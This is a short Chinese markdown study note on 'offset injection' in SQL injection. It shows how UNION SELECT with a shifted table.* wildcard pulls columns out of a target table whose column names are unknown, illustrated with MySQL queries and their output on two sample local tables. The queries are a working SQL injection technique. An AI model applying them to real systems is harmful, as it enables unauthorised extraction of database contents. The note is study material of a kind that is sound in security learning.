Skip to content

Latest commit

 

History

History
53 lines (51 loc) · 2.71 KB

access.md

File metadata and controls

53 lines (51 loc) · 2.71 KB

今天看到freebuff上有一篇位溢注入的,个人感觉和偏移注入差别不大

偏移注入适用情况:

  • 目标表的字段无法被猜出,但是基本的id字段应该是可知的
  • 当前可注入的表的字段数大于目标表

实验用到的两张表: 可注入的user表

+------+------+----------+-------+-------+---------+---------+------+
| id   | user | pass     | birth | phone | country | city    | time |
+------+------+----------+-------+-------+---------+---------+------+
|    1 | user | userpass | 1999  | 13177 | cn      | beijing |    9 |
+------+------+----------+-------+-------+---------+---------+------+
1 row in set (0.00 sec)

目标test表

+----+----------+----------+
| id | username | password |
+----+----------+----------+
|  1 | test     | test     |
+----+----------+----------+

这里假设test里的字段除了id都是随机度非常高的不可测字符 那么根据union select的特性,下面语句可以被执行

mysql> select * from user union select 1,2,3,4,5,test.* from test;
+------+------+----------+-------+-------+---------+---------+------+
| id   | user | pass     | birth | phone | country | city    | time |
+------+------+----------+-------+-------+---------+---------+------+
|    1 | user | userpass | 1999  | 13177 | cn      | beijing | 9    |
|    1 | 2    | 3        | 4     |     5 | 1       | test    | test |
+------+------+----------+-------+-------+---------+---------+------+
2 rows in set (0.00 sec)
mysql> select * from user union select 1,2,3,4,test.*,8 from test;
+------+------+----------+-------+-------+---------+---------+------+
| id   | user | pass     | birth | phone | country | city    | time |
+------+------+----------+-------+-------+---------+---------+------+
|    1 | user | userpass | 1999  | 13177 | cn      | beijing |    9 |
|    1 | 2    | 3        | 4     |     1 | test    | test    |    8 |
+------+------+----------+-------+-------+---------+---------+------+
mysql> select * from user union select 1,2,test.*,test.* from test;
+------+------+----------+-------+-------+---------+---------+------+
| id   | user | pass     | birth | phone | country | city    | time |
+------+------+----------+-------+-------+---------+---------+------+
|    1 | user | userpass | 1999  | 13177 | cn      | beijing | 9    |
|    1 | 2    | 1        | test  | test  | 1       | test    | test |
+------+------+----------+-------+-------+---------+---------+------+
2 rows in set (0.00 sec)
2 rows in set (0.00 sec)

这里的移位的意思就是把test.*的内容,逐渐向前移动,直到移到回显数据的地方,其实这样看,这和access下的偏移注入没有太大的区别,少的只是后面的join连表而已